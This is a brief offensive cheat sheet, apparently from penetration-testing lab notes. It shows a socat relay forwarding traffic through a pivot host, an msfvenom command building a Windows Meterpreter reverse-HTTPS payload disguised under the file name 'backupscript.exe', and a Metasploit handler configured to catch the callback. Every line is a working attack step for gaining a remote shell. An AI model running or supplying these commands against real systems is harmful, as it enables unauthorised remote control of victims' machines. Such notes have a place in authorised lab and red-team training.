# Example: socat TCP4-LISTEN:8080,fork TCP4:10.10.14.18:80
socat TCP4-LISTEN:<local-port>,fork TCP4:10.10.14.18:<remote-port>
# Generate Payload
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=172.16.5.129 -f exe -o backupscript.exe LPORT=8080
# msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_https
set lhost 0.0.0.0
set lport 80
run